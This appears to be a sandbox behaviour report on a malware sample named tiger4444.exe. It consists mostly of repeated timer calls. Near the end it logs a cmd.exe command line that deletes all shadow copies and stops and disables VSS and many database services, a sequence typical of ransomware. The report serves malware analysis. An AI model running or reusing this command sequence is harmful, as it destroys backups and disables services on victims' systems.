Get Time type = Performance Ctr, time = 13796720748 True 1
Fn
Get Time type = Performance Ctr, time = 13797039030 True 1
Fn
Get Time type = Performance Ctr, time = 13797255782 True 1
Fn
Get Time type = Performance Ctr, time = 13797568094 True 1
Fn
Get Time type = Performance Ctr, time = 13797777637 True 1
Fn
Get Time type = Performance Ctr, time = 13798399703 True 1
Fn
Get Time type = Performance Ctr, time = 13798566099 True 1
Fn
Get Time type = Performance Ctr, time = 13798843709 True 1
Fn
Get Time type = Performance Ctr, time = 13799089935 True 1
Fn
Get Time type = Performance Ctr, time = 13800216054 True 1
Fn
Get Time type = Performance Ctr, time = 13800336983 True 1
Fn
Get Time type = Performance Ctr, time = 13802807861 True 1
Fn
Get Time type = Performance Ctr, time = 13802973415 True 1
Fn
Get Time type = Performance Ctr, time = 13803237592 True 1
Fn
Get Time type = Performance Ctr, time = 13803372162 True 1
Fn
Get Time type = Performance Ctr, time = 13803676662 True 1
Fn
Get Time type = Performance Ctr, time = 13803813633 True 1
Fn
Get Time type = Performance Ctr, time = 13804027115 True 1
Fn
Get Time type = Performance Ctr, time = 13804146109 True 1
Fn
Get Time type = Performance Ctr, time = 13804558642 True 1
Fn
Get Time type = Performance Ctr, time = 13804674967 True 1
Fn
Get Time type = Performance Ctr, time = 13805170172 True 1
Fn
Get Time type = Performance Ctr, time = 13805337513 True 1
Fn
Get Time type = Performance Ctr, time = 13805589721 True 1
Fn
Get Time type = Performance Ctr, time = 13805953901 True 1
Fn
Get Time type = Performance Ctr, time = 13806257737 True 1
Fn
Get Time type = Performance Ctr, time = 13806474718 True 1
Fn
Get Time type = Performance Ctr, time = 13817828029 True 1
Fn
Get Time type = Performance Ctr, time = 13821952791 True 1
Fn
Get Time type = Performance Ctr, time = 13825567538 True 1
Fn
Get Time type = Performance Ctr, time = 13827748758 True 1
Fn
Get Time type = Performance Ctr, time = 13854158371 True 1
Fn
Get Time type = Performance Ctr, time = 13854421013 True 1
Fn
Get Time type = Performance Ctr, time = 13854972660 True 1
Fn
Get Time type = Performance Ctr, time = 13855147097 True 1
Fn
Get Time type = Performance Ctr, time = 13855565953 True 1
Fn
Get Time type = Performance Ctr, time = 13855828332 True 1
Fn
Get Time type = Performance Ctr, time = 13856088970 True 1
Fn
Get Time type = Performance Ctr, time = 13856244663 True 1
Fn
Get Time type = Performance Ctr, time = 13857555589 True 1
Fn
Get Time type = Performance Ctr, time = 13857754191 True 1
Fn
Get Time type = Performance Ctr, time = 13858025115 True 1
Fn
Get Time type = Performance Ctr, time = 13858132807 True 1
Fn
Get Time type = Performance Ctr, time = 13859797798 True 1
Fn
Get Time type = Performance Ctr, time = 13859950575 True 1
Fn
Get Time type = Performance Ctr, time = 13860189099 True 1
Fn
Get Time type = Performance Ctr, time = 13860353832 True 1
Fn
Get Time type = Performance Ctr, time = 13860612796 True 1
Fn
Get Time type = Performance Ctr, time = 13860820848 True 1
Fn
Get Time type = Performance Ctr, time = 13861874207 True 1
Fn
Get Time type = Performance Ctr, time = 13862056848 True 1
Fn
Get Time type = Performance Ctr, time = 13862349808 True 1
Fn
Get Time type = Performance Ctr, time = 13862637855 True 1
Fn
Get Time type = Performance Ctr, time = 13863004139 True 1
Fn
Get Time type = Performance Ctr, time = 13863162726 True 1
Fn
Get Time type = Performance Ctr, time = 13863577144 True 1
Fn
Get Time type = Performance Ctr, time = 13863800692 True 1
Fn
Get Time type = Performance Ctr, time = 13864094783 True 1
Fn
Get Time type = Performance Ctr, time = 13864276987 True 1
Fn
Get Time type = Performance Ctr, time = 13865360966 True 1
Fn
Get Time type = Performance Ctr, time = 13865667879 True 1
Fn
Get Time type = Performance Ctr, time = 13866006543 True 1
Fn
Get Time type = Performance Ctr, time = 13866330664 True 1
Fn
Get Time type = Performance Ctr, time = 13867396530 True 1
Fn
Get Time type = Performance Ctr, time = 13867553049 True 1
Fn
Get Time type = Performance Ctr, time = 13867782570 True 1
Fn
Get Time type = Performance Ctr, time = 13867957003 True 1
Fn
Get Time type = Performance Ctr, time = 13870331429 True 1
Fn
Get Time type = Performance Ctr, time = 13870560328 True 1
Fn
Get Time type = Performance Ctr, time = 13871649757 True 1
Fn
Get Time type = Performance Ctr, time = 13871853091 True 1
Fn
Get Time type = Performance Ctr, time = 13872384778 True 1
Fn
Get Time type = Performance Ctr, time = 13872647239 True 1
Fn
Get Time type = Performance Ctr, time = 13888516128 True 1
Fn
Get Time type = Performance Ctr, time = 13888797688 True 1
Fn
Get Time type = Performance Ctr, time = 13889084584 True 1
Fn
Get Time type = Performance Ctr, time = 13889218889 True 1
Fn
Get Time type = Performance Ctr, time = 13889462490 True 1
Fn
Get Time type = Performance Ctr, time = 13889612650 True 1
Fn
Get Time type = Performance Ctr, time = 13915733437 True 1
Fn
Get Time type = Performance Ctr, time = 13915930130 True 1
Fn
Get Time type = Performance Ctr, time = 13916286026 True 1
Fn
Get Time type = Performance Ctr, time = 13916507505 True 1
Fn
Get Time type = Performance Ctr, time = 13916898619 True 1
Fn
Get Time type = Performance Ctr, time = 13917060488 True 1
Fn
Get Time type = Performance Ctr, time = 13917372343 True 1
Fn
Get Time type = Performance Ctr, time = 13917725533 True 1
Fn
Get Time type = Performance Ctr, time = 13918128942 True 1
Fn
Get Time type = Performance Ctr, time = 13943310764 True 1
Fn
Get Time type = Performance Ctr, time = 13944690364 True 1
Fn
Get Time type = Performance Ctr, time = 13944982325 True 1
Fn
Get Time type = Performance Ctr, time = 13945289095 True 1
Fn
Get Time type = Performance Ctr, time = 13945545431 True 1
Fn
Get Time type = Performance Ctr, time = 13945879744 True 1
Fn
Get Time type = Performance Ctr, time = 13946123223 True 1
Fn
Get Time type = Performance Ctr, time = 13950517790 True 1
Fn
Get Time type = Performance Ctr, time = 13950625373 True 1
Fn
Get Time type = Performance Ctr, time = 13950873275 True 1
Fn
Get Time type = Performance Ctr, time = 13951008570 True 1
Fn
Get Time type = Performance Ctr, time = 13978727785 True 1
Fn
Get Time type = Performance Ctr, time = 13978844010 True 1
Fn
Get Time type = Performance Ctr, time = 13979067525 True 1
Fn
Get Time type = Performance Ctr, time = 13979221445 True 1
Fn
Get Time type = Performance Ctr, time = 13979472068 True 1
Fn
Get Time type = Performance Ctr, time = 13979626015 True 1
Fn
Get Time type = Performance Ctr, time = 13979876128 True 1
Fn
Get Time type = Performance Ctr, time = 13980127410 True 1
Fn
Get Time type = Performance Ctr, time = 14090360358 True 1
Fn
Get Time type = Performance Ctr, time = 14090566781 True 1
Fn
Get Time type = Performance Ctr, time = 14093000820 True 1
Fn
Get Time type = Performance Ctr, time = 14093209754 True 1
Fn
Get Time type = Performance Ctr, time = 14093629397 True 1
Fn
Get Time type = Performance Ctr, time = 14093873602 True 1
Fn
Get Time type = Performance Ctr, time = 14094148869 True 1
Fn
Get Time type = Performance Ctr, time = 14094338123 True 1
Fn
Get Time type = Performance Ctr, time = 14094574772 True 1
Fn
Get Time type = Performance Ctr, time = 14094698477 True 1
Fn
Get Time type = Performance Ctr, time = 14094982127 True 1
Fn
Get Time type = Performance Ctr, time = 14095217557 True 1
Fn
Get Time type = Performance Ctr, time = 14095550458 True 1
Fn
Get Time type = Performance Ctr, time = 14095653941 True 1
Fn
Get Time type = Performance Ctr, time = 14095866450 True 1
Fn
Get Time type = Performance Ctr, time = 14096154653 True 1
Fn
Get Time type = Performance Ctr, time = 14097635831 True 1
Fn
Get Time type = Performance Ctr, time = 14097883362 True 1
Fn
Get Time type = Performance Ctr, time = 14098358742 True 1
Fn
Get Time type = Performance Ctr, time = 14098630344 True 1
Fn
Get Time type = Performance Ctr, time = 14098904740 True 1
Fn
Get Time type = Performance Ctr, time = 14099032778 True 1
Fn
Get Time type = Performance Ctr, time = 14099277827 True 1
Fn
Get Time type = Performance Ctr, time = 14099409534 True 1
Fn
Get Time type = Performance Ctr, time = 14099645632 True 1
Fn
Get Time type = Performance Ctr, time = 14099776776 True 1
Fn
Get Time type = Performance Ctr, time = 14100136844 True 1
Fn
Get Time type = Performance Ctr, time = 14100254130 True 1
Fn
Get Time type = Performance Ctr, time = 14100464270 True 1
Fn
Get Time type = Performance Ctr, time = 14100672905 True 1
Fn
Get Time type = Performance Ctr, time = 14100928724 True 1
Fn
Get Time type = Performance Ctr, time = 14101219708 True 1
Fn
Get Time type = Performance Ctr, time = 14102229318 True 1
Fn
Get Time type = Performance Ctr, time = 14102398920 True 1
Fn
Get Time type = Performance Ctr, time = 14102629122 True 1
Fn
Get Time type = Performance Ctr, time = 14102812357 True 1
Fn
Get Time type = Performance Ctr, time = 14103106224 True 1
Fn
Get Time type = Performance Ctr, time = 14103221269 True 1
Fn
Get Time type = Performance Ctr, time = 14103458370 True 1
Fn
Get Time type = Performance Ctr, time = 14103585699 True 1
Fn
Get Time type = Performance Ctr, time = 14103798747 True 1
Fn
Get Time type = Performance Ctr, time = 14103906714 True 1
Fn
Get Time type = Performance Ctr, time = 14104111287 True 1
Fn
Get Time type = Performance Ctr, time = 14104355846 True 1
Fn
Get Time type = Performance Ctr, time = 14104621815 True 1
Fn
Get Time type = Performance Ctr, time = 14104846960 True 1
Fn
Get Time type = Performance Ctr, time = 14105090026 True 1
Fn
Get Time type = Performance Ctr, time = 14105293553 True 1
Fn
Get Time type = Performance Ctr, time = 14106009462 True 1
Fn
Get Time type = Performance Ctr, time = 14106218118 True 1
Fn
Get Time type = Performance Ctr, time = 14106637522 True 1
Fn
Get Time type = Performance Ctr, time = 14106907790 True 1
Fn
Get Time type = Performance Ctr, time = 14107178596 True 1
Fn
Get Time type = Performance Ctr, time = 14107501536 True 1
Fn
Get Time type = Performance Ctr, time = 14107778907 True 1
Fn
Get Time type = Performance Ctr, time = 14107899293 True 1
Fn
Get Time type = Performance Ctr, time = 14108735608 True 1
Fn
Get Time type = Performance Ctr, time = 14108940554 True 1
Fn
Get Time type = Performance Ctr, time = 14109157126 True 1
Fn
Get Time type = Performance Ctr, time = 14109352645 True 1
Fn
Get Time type = Performance Ctr, time = 14109608246 True 1
Fn
Get Time type = Performance Ctr, time = 14109731089 True 1
Fn
Get Time type = Performance Ctr, time = 14110147780 True 1
Fn
Get Time type = Performance Ctr, time = 14110282280 True 1
Fn
Get Time type = Performance Ctr, time = 14122640658 True 1
Fn
Get Time type = Performance Ctr, time = 14122865540 True 1
Fn
Get Time type = Performance Ctr, time = 14123224974 True 1
Fn
Get Time type = Performance Ctr, time = 14123548458 True 1
Fn
Get Time type = Performance Ctr, time = 14123886530 True 1
Fn
Get Time type = Performance Ctr, time = 14124373494 True 1
Fn
Get Time type = Performance Ctr, time = 14124812519 True 1
Fn
Get Time type = Performance Ctr, time = 14125088074 True 1
Fn
Get Time type = Performance Ctr, time = 14125452822 True 1
Fn
Get Time type = Performance Ctr, time = 14125631370 True 1
Fn
Get Time type = Performance Ctr, time = 14126212662 True 1
Fn
Get Time type = Performance Ctr, time = 14126399828 True 1
Fn
Get Time type = Performance Ctr, time = 14126811011 True 1
Fn
Get Time type = Performance Ctr, time = 14126940461 True 1
Fn
Get Time type = Performance Ctr, time = 14127235559 True 1
Fn
Get Time type = Performance Ctr, time = 14127398200 True 1
Fn
Get Time type = Performance Ctr, time = 14133651627 True 1
Fn
Get Time type = Performance Ctr, time = 14133906877 True 1
Fn
Get Time type = Performance Ctr, time = 14134215388 True 1
Fn
Get Time type = Performance Ctr, time = 14134360802 True 1
Fn
Get Time type = Performance Ctr, time = 14134634746 True 1
Fn
Get Time type = Performance Ctr, time = 14136803607 True 1
Fn
Get Time type = Performance Ctr, time = 14137152891 True 1
Fn
Get Time type = Performance Ctr, time = 14137272961 True 1
Fn
Get Time type = Performance Ctr, time = 14137739157 True 1
Fn
Get Time type = Performance Ctr, time = 14137963375 True 1
Fn
Get Time type = Performance Ctr, time = 14142047579 True 1
Fn
Get Time type = Performance Ctr, time = 14142147999 True 1
Fn
Get Time type = Performance Ctr, time = 14142363764 True 1
Fn
Get Time type = Performance Ctr, time = 14142480993 True 1
Fn
Get Time type = Performance Ctr, time = 14142778283 True 1
Fn
Get Time type = Performance Ctr, time = 14143014271 True 1
Fn
Get Time type = Performance Ctr, time = 14143332875 True 1
Fn
Get Time type = Performance Ctr, time = 14143592028 True 1
Fn
Get Time type = Performance Ctr, time = 14144218654 True 1
Fn
Get Time type = Performance Ctr, time = 14144426403 True 1
Fn
Get Time type = Performance Ctr, time = 14144826888 True 1
Fn
Get Time type = Performance Ctr, time = 14145076478 True 1
Fn
Get Time type = Performance Ctr, time = 14145425097 True 1
Fn
Get Time type = Performance Ctr, time = 14145648744 True 1
Fn
Get Time type = Performance Ctr, time = 14145969656 True 1
Fn
Get Time type = Performance Ctr, time = 14146194849 True 1
Fn
Get Time type = Performance Ctr, time = 14146510406 True 1
Fn
Get Time type = Performance Ctr, time = 14146729469 True 1
Fn
Get Time type = Performance Ctr, time = 14147010237 True 1
Fn
Get Time type = Performance Ctr, time = 14147270000 True 1
Fn
Get Time type = Performance Ctr, time = 14147632394 True 1
Fn
Get Time type = Performance Ctr, time = 14147841625 True 1
Fn
Get Time type = Performance Ctr, time = 14148150071 True 1
Fn
Get Time type = Performance Ctr, time = 14148290843 True 1
Fn
Get Time type = Performance Ctr, time = 14148697917 True 1
Fn
Get Time type = Performance Ctr, time = 14148924043 True 1
Fn
Get Time type = Performance Ctr, time = 14149359029 True 1
Fn
Get Time type = Performance Ctr, time = 14149473414 True 1
Fn
Get Time type = Performance Ctr, time = 14149789846 True 1
Fn
Get Time type = Performance Ctr, time = 14150018798 True 1
Fn
Get Time type = Performance Ctr, time = 14150440171 True 1
Fn
Get Time type = Performance Ctr, time = 14150670349 True 1
Fn
Get Time type = Performance Ctr, time = 14151019683 True 1
Fn
Get Time type = Performance Ctr, time = 14151264392 True 1
Fn
Get Time type = Performance Ctr, time = 14151905629 True 1
Fn
Get Time type = Performance Ctr, time = 14152230687 True 1
Fn
Get Time type = Performance Ctr, time = 14152643605 True 1
Fn
Get Time type = Performance Ctr, time = 14152790098 True 1
Fn
Get Time type = Performance Ctr, time = 14153039465 True 1
Fn
Get Time type = Performance Ctr, time = 14153285851 True 1
Fn
Get Time type = Performance Ctr, time = 14153685554 True 1
Fn
Get Time type = Performance Ctr, time = 14153946940 True 1
Fn
Get Time type = Performance Ctr, time = 14154352648 True 1
Fn
Get Time type = Performance Ctr, time = 14154670583 True 1
Fn
Get Time type = Performance Ctr, time = 14155139966 True 1
Fn
Get Time type = Performance Ctr, time = 14155426466 True 1
Fn
Get Time type = Performance Ctr, time = 14155838929 True 1
Fn
Get Time type = Performance Ctr, time = 14155999042 True 1
Fn
Get Time type = Performance Ctr, time = 14156292854 True 1
Fn
Get Time type = Performance Ctr, time = 14156509520 True 1
Fn
Get Time type = Performance Ctr, time = 14157254158 True 1
Fn
Get Time type = Performance Ctr, time = 14157431197 True 1
Fn
Get Time type = Performance Ctr, time = 14157713652 True 1
Fn
Get Time type = Performance Ctr, time = 14157955683 True 1
Fn
Get Time type = Performance Ctr, time = 14158359788 True 1
Fn
Get Time type = Performance Ctr, time = 14158631837 True 1
Fn
Get Time type = Performance Ctr, time = 14159054675 True 1
Fn
Get Time type = Performance Ctr, time = 14159350748 True 1
Fn
Get Time type = Performance Ctr, time = 14159736108 True 1
Fn
Get Time type = Performance Ctr, time = 14159948558 True 1
Fn
Get Time type = Performance Ctr, time = 14165474404 True 1
Fn
Get Time type = Performance Ctr, time = 14165860629 True 1
Fn
Get Time type = Performance Ctr, time = 14170668879 True 1
Fn
Get Time type = Performance Ctr, time = 14170984974 True 1
Fn
Get Time type = Performance Ctr, time = 14171226457 True 1
Fn
Get Time type = Performance Ctr, time = 14173093821 True 1
Fn
Get Time type = Performance Ctr, time = 14173426047 True 1
Fn
Get Time type = Performance Ctr, time = 14175226731 True 1
Fn
Get Time type = Performance Ctr, time = 14176280983 True 1
Fn
Get Time type = Performance Ctr, time = 14177536763 True 1
Fn
Get Time type = Performance Ctr, time = 14177885766 True 1
Fn
Get Time type = Performance Ctr, time = 14178828047 True 1
Fn
Get Time type = Performance Ctr, time = 14179046000 True 1
Fn
Get Time type = Performance Ctr, time = 14179897106 True 1
Fn
Get Time type = Performance Ctr, time = 14180316414 True 1
Fn
Get Time type = Performance Ctr, time = 14182368383 True 1
Fn
Get Time type = Performance Ctr, time = 14183058692 True 1
Fn
Get Time type = Performance Ctr, time = 14184406980 True 1
Fn
Get Time type = Performance Ctr, time = 14184636464 True 1
Fn
Get Time type = Performance Ctr, time = 14199875249 True 1
Fn
Get Time type = Performance Ctr, time = 14202826347 True 1
Fn
Get Time type = Performance Ctr, time = 14203833908 True 1
Fn
Get Time type = Performance Ctr, time = 14204134169 True 1
Fn
Get Time type = Performance Ctr, time = 14207124016 True 1
Fn
Get Time type = Performance Ctr, time = 14208172149 True 1
Fn
Get Time type = Performance Ctr, time = 14208902959 True 1
Fn
Get Time type = Performance Ctr, time = 14209154092 True 1
Fn
Get Time type = Performance Ctr, time = 14209794389 True 1
Fn
Get Time type = Performance Ctr, time = 14210222189 True 1
Fn
Get Time type = Performance Ctr, time = 14211412803 True 1
Fn
Get Time type = Performance Ctr, time = 14211697121 True 1
Fn
Get Time type = Performance Ctr, time = 14238900738 True 1
Fn
Get Time type = Performance Ctr, time = 14240248614 True 1
Fn
Get Time type = Performance Ctr, time = 14242189887 True 1
Fn
Get Time type = Performance Ctr, time = 14242398550 True 1
Fn
Get Time type = Performance Ctr, time = 14255006188 True 1
Fn
Get Time type = Performance Ctr, time = 14255262588 True 1
Fn
Get Time type = Performance Ctr, time = 14255764869 True 1
Fn
Get Time type = Performance Ctr, time = 14255981528 True 1
Fn
Get Time type = Performance Ctr, time = 14258096865 True 1
Fn
Get Time type = Performance Ctr, time = 14258431343 True 1
Fn
Get Time type = Performance Ctr, time = 14259901547 True 1
Fn
Get Time type = Performance Ctr, time = 14260234422 True 1
Fn
Get Time type = Performance Ctr, time = 14260856103 True 1
Fn
Get Time type = Performance Ctr, time = 14261226907 True 1
Fn
Get Time type = Performance Ctr, time = 14261609679 True 1
Fn
Get Time type = Performance Ctr, time = 14261838516 True 1
Fn
Get Time type = Performance Ctr, time = 14264384668 True 1
Fn
Get Time type = Performance Ctr, time = 14264654040 True 1
Fn
Get Time type = Performance Ctr, time = 14265790344 True 1
Fn
Get Time type = Performance Ctr, time = 14266118841 True 1
Fn
Get Time type = Performance Ctr, time = 14266660129 True 1
Fn
Get Time type = Performance Ctr, time = 14266892401 True 1
Fn
Get Time type = Performance Ctr, time = 14267374565 True 1
Fn
Get Time type = Performance Ctr, time = 14267577449 True 1
Fn
Get Time type = Performance Ctr, time = 14268763342 True 1
Fn
Get Time type = Performance Ctr, time = 14269074493 True 1
Fn
Get Time type = Performance Ctr, time = 14269388693 True 1
Fn
Get Time type = Performance Ctr, time = 14273302769 True 1
Fn
Get Time type = Performance Ctr, time = 14273540438 True 1
Fn
Get Time type = Performance Ctr, time = 14273716282 True 1
Fn
Get Time type = Performance Ctr, time = 14273990170 True 1
Fn
Get Time type = Performance Ctr, time = 14276784434 True 1
Fn
Get Time type = Performance Ctr, time = 14279342348 True 1
Fn
Get Time type = Performance Ctr, time = 14281406814 True 1
Fn
Get Time type = Performance Ctr, time = 14281924707 True 1
Fn
Get Time type = Performance Ctr, time = 14282131261 True 1
Fn
Get Time type = Performance Ctr, time = 14282427016 True 1
Fn
Get Time type = Performance Ctr, time = 14284254391 True 1
Fn
Get Time type = Performance Ctr, time = 14287382420 True 1
Fn
Get Time type = Performance Ctr, time = 14290069322 True 1
Fn
Get Time type = Performance Ctr, time = 14299391275 True 1
Fn
Get Time type = Performance Ctr, time = 14299679109 True 1
Fn
Get Time type = Performance Ctr, time = 14300734900 True 1
Fn
Get Time type = Performance Ctr, time = 14308223369 True 1
Fn
Get Time type = Performance Ctr, time = 14308529435 True 1
Fn
Get Time type = Performance Ctr, time = 14312015904 True 1
Fn
Get Time type = Performance Ctr, time = 14312280118 True 1
Fn
Get Time type = Performance Ctr, time = 14312490992 True 1
Fn
Get Time type = Performance Ctr, time = 14312757668 True 1
Fn
Get Time type = Performance Ctr, time = 14315112822 True 1
Fn
Get Time type = Performance Ctr, time = 14315352056 True 1
Fn
Get Time type = Performance Ctr, time = 14315624862 True 1
Fn
Get Time type = Performance Ctr, time = 14317058957 True 1
Fn
Get Time type = Performance Ctr, time = 14319630183 True 1
Fn
Get Time type = Performance Ctr, time = 14319913152 True 1
Fn
Get Time type = Performance Ctr, time = 14321353775 True 1
Fn
Get Time type = Performance Ctr, time = 14321690447 True 1
Fn
Get Time type = Performance Ctr, time = 14322247250 True 1
Fn
Get Time type = Performance Ctr, time = 14322540863 True 1
Fn
Get Time type = Performance Ctr, time = 14323563975 True 1
Fn
Get Time type = Performance Ctr, time = 14324808583 True 1
Fn
Get Time type = Performance Ctr, time = 14325174796 True 1
Fn
Get Time type = Performance Ctr, time = 14329281827 True 1
Fn
Get Time type = Performance Ctr, time = 14329587390 True 1
Fn
Get Time type = Performance Ctr, time = 14341160660 True 1
Fn
Get Time type = Performance Ctr, time = 14341616566 True 1
Fn
Get Time type = Performance Ctr, time = 14343587169 True 1
Fn
Get Time type = Performance Ctr, time = 14345912918 True 1
Fn
Get Time type = Performance Ctr, time = 14346565555 True 1
Fn
Get Time type = Performance Ctr, time = 14354898639 True 1
Fn
Get Time type = Performance Ctr, time = 14355149223 True 1
Fn
Get Time type = Performance Ctr, time = 14357459556 True 1
Fn
Get Time type = Performance Ctr, time = 14376857718 True 1
Fn
Get Time type = Performance Ctr, time = 14377949496 True 1
Fn
Get Time type = Performance Ctr, time = 14380020709 True 1
Fn
Get Time type = Performance Ctr, time = 14380279824 True 1
Fn
Get Time type = Performance Ctr, time = 14382108257 True 1
Fn
Get Time type = Performance Ctr, time = 14382310064 True 1
Fn
Get Time type = Performance Ctr, time = 14382581141 True 1
Fn
Get Time type = Performance Ctr, time = 14382836852 True 1
Fn
Get Time type = Performance Ctr, time = 14383931751 True 1
Fn
Get Time type = Performance Ctr, time = 14384293177 True 1
Fn
Get Time type = Performance Ctr, time = 14384530758 True 1
Fn
Get Time type = Performance Ctr, time = 14384802545 True 1
Fn
Get Time type = Performance Ctr, time = 14385074224 True 1
Fn
Get Time type = Performance Ctr, time = 14385297912 True 1
Fn
Get Time type = Performance Ctr, time = 14385526301 True 1
Fn
Get Time type = Performance Ctr, time = 14385798045 True 1
Fn
Get Time type = Performance Ctr, time = 14386041979 True 1
Fn
Get Time type = Performance Ctr, time = 14386330360 True 1
Fn
Get Time type = Performance Ctr, time = 14386578524 True 1
Fn
Get Time type = Performance Ctr, time = 14386874339 True 1
Fn
Get Time type = Performance Ctr, time = 14390212438 True 1
Fn
Get Time type = Performance Ctr, time = 14391164134 True 1
Fn
Get Time type = Performance Ctr, time = 14391407703 True 1
Fn
Get Time type = Performance Ctr, time = 14391644172 True 1
Fn
Get Time type = Performance Ctr, time = 14396518132 True 1
Fn
Get Time type = Performance Ctr, time = 14399293617 True 1
Fn
Get Time type = Performance Ctr, time = 14402701856 True 1
Fn
Get Time type = Performance Ctr, time = 14402979891 True 1
Fn
Get Time type = Performance Ctr, time = 14408890184 True 1
Fn
Get Time type = Performance Ctr, time = 14409212462 True 1
Fn
Get Time type = Performance Ctr, time = 14413191019 True 1
Fn
Get Time type = Performance Ctr, time = 14416295439 True 1
Fn
Get Time type = Performance Ctr, time = 14417662101 True 1
Fn
Get Time type = Performance Ctr, time = 14421464371 True 1
Fn
Get Time type = Performance Ctr, time = 14426029382 True 1
Fn
Get Time type = Performance Ctr, time = 14426234944 True 1
Fn
Get Time type = Performance Ctr, time = 14427084216 True 1
Fn
Get Time type = Performance Ctr, time = 14427286014 True 1
Fn
Get Time type = Performance Ctr, time = 14446893266 True 1
Fn
Get Time type = Performance Ctr, time = 14461748646 True 1
Fn
Get Time type = Performance Ctr, time = 14463457700 True 1
Fn
Get Time type = Performance Ctr, time = 14463728010 True 1
Fn
Get Time type = Performance Ctr, time = 14464324880 True 1
Fn
Get Time type = Performance Ctr, time = 14464613800 True 1
Fn
Get Time type = Performance Ctr, time = 14466673208 True 1
Fn
Get Time type = Performance Ctr, time = 14582156369 True 1
Fn
Get Time type = Performance Ctr, time = 14648430820 True 1
Fn
Get Time type = Performance Ctr, time = 14656226163 True 1
Fn
Get Time type = Performance Ctr, time = 14657202287 True 1
Fn
Get Time type = Performance Ctr, time = 14657672400 True 1
Fn
Get Time type = Performance Ctr, time = 14658700177 True 1
Fn
Get Time type = Performance Ctr, time = 14664617368 True 1
Fn
Get Time type = Performance Ctr, time = 14666680572 True 1
Fn
Get Time type = Performance Ctr, time = 14667153601 True 1
Fn
Get Time type = Performance Ctr, time = 14668924757 True 1
Fn
Get Time type = Performance Ctr, time = 14669458175 True 1
Fn
Get Time type = Performance Ctr, time = 14671800903 True 1
Fn
Get Time type = Performance Ctr, time = 14672487048 True 1
Fn
Get Time type = Performance Ctr, time = 14674367301 True 1
Fn
Get Time type = Performance Ctr, time = 14674775047 True 1
Fn
Get Time type = Performance Ctr, time = 14676603534 True 1
Fn
Get Time type = Performance Ctr, time = 14677092902 True 1
Fn
Get Time type = Performance Ctr, time = 14679293683 True 1
Fn
Get Time type = Performance Ctr, time = 14679797542 True 1
Fn
Get Time type = Performance Ctr, time = 14701223767 True 1
Fn
Get Time type = Performance Ctr, time = 14701673648 True 1
Fn
Get Time type = Performance Ctr, time = 14721629677 True 1
Fn
Get Time type = Performance Ctr, time = 14722044705 True 1
Fn
Get Time type = Performance Ctr, time = 14749677236 True 1
Fn
Get Time type = Performance Ctr, time = 14750125557 True 1
Fn
Get Time type = Performance Ctr, time = 14757368652 True 1
Fn
Get Time type = Performance Ctr, time = 14757796658 True 1
Fn
Get Time type = Performance Ctr, time = 14787208904 True 1
Fn
Get Time type = Performance Ctr, time = 14787635314 True 1
Fn
Get Time type = Performance Ctr, time = 14802027903 True 1
Fn
Get Time type = Performance Ctr, time = 14817838742 True 1
Fn
Get Time type = Performance Ctr, time = 14862741538 True 1
Fn
Get Time type = Performance Ctr, time = 14863505854 True 1
Fn
Get Time type = Performance Ctr, time = 14886734914 True 1
Fn
Get Time type = Performance Ctr, time = 14909619505 True 1
Fn
Get Time type = Performance Ctr, time = 14910048628 True 1
Fn
Get Time type = Performance Ctr, time = 14914848649 True 1
Fn
Get Time type = Performance Ctr, time = 14915124600 True 1
Fn
Get Time type = Performance Ctr, time = 14934627859 True 1
Fn
Get Time type = Performance Ctr, time = 14974741075 True 1
Fn
Get Time type = Performance Ctr, time = 14983179575 True 1
Fn
Get Time type = Performance Ctr, time = 14985070592 True 1
Fn
Get Time type = Performance Ctr, time = 14989075886 True 1
Fn
Get Time type = Performance Ctr, time = 14996568656 True 1
Fn
Get Time type = Performance Ctr, time = 15082578197 True 1
Fn
Get Time type = Performance Ctr, time = 15083795277 True 1
Fn
Get Time type = Performance Ctr, time = 15087382919 True 1
Fn
Get Time type = Performance Ctr, time = 15087862892 True 1
Fn
Get Time type = Performance Ctr, time = 15088199896 True 1
Fn
Get Time type = Performance Ctr, time = 15088477111 True 1
Fn
Get Time type = Performance Ctr, time = 15089439220 True 1
Fn
Get Time type = Performance Ctr, time = 15089964618 True 1
Fn
Get Time type = Performance Ctr, time = 15090180112 True 1
Fn
Get Time type = Performance Ctr, time = 15090453969 True 1
Fn
Get Time type = Performance Ctr, time = 15105336511 True 1
Fn
Get Time type = Performance Ctr, time = 15108363372 True 1
Fn
Get Info type = Hardware Information True 1
Fn
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 1
Fn
Data
Get Environment String name = allusersprofile, result_out = C:\ProgramData True 1
Fn
Process #2: cmd.exe
50 0
»
Information Value
ID #2
File Name c:\windows\syswow64\cmd.exe
Command Line Truncated command line: C:\WINDOWS\system32\cmd.exe /c @echo off sc config browser sc config browser start=enabled vssadmin delete shadows /all /quiet sc stop vss sc config vss start=disabled sc stop MongoDB sc config MongoDB start=disabled sc stop SQLWriter sc config SQLWriter start=disabled sc stop MSSQLServerOLAPService sc config MSSQLServerOLAPService start=disabled sc stop MSSQLSERVER sc config MSSQLSERVER start=disabled sc stop MSSQL$SQLEXPRESS sc config MSSQL$SQLEXPRESS start=disabled sc stop ReportServer sc config ReportServer start=disabled sc stop OracleServiceORCL sc config OracleServiceORCL start=disabled sc stop OracleDBConsoleorcl sc config OracleDBConsoleorcl start=disabled sc stop OracleMTSRecoveryService sc config OracleMTSRecoveryService start=disabled sc stop OracleVssWr...
Initial Working Directory C:\Users\FD1HVy\Desktop\
Monitor Start Time: 00:00:32, Reason: Child Process
Unmonitor End Time: 00:00:37, Reason: Self Terminated
Monitor Duration 00:00:05
OS Process Information
»
Information Value
PID 0xc04
Parent PID 0xda8 (c:\users\fd1hvy\desktop\tiger4444.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username NQDPDE\FD1HVy
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 6D8
0x 9E0
Host Behavior
File (12)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\FD1HVy\Desktop type = file_attributes True 2
Fn
Open STD_OUTPUT_HANDLE - True 6
Fn
Open STD_INPUT_HANDLE - True 4
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 16, type = REG_NONE False 1
Fn
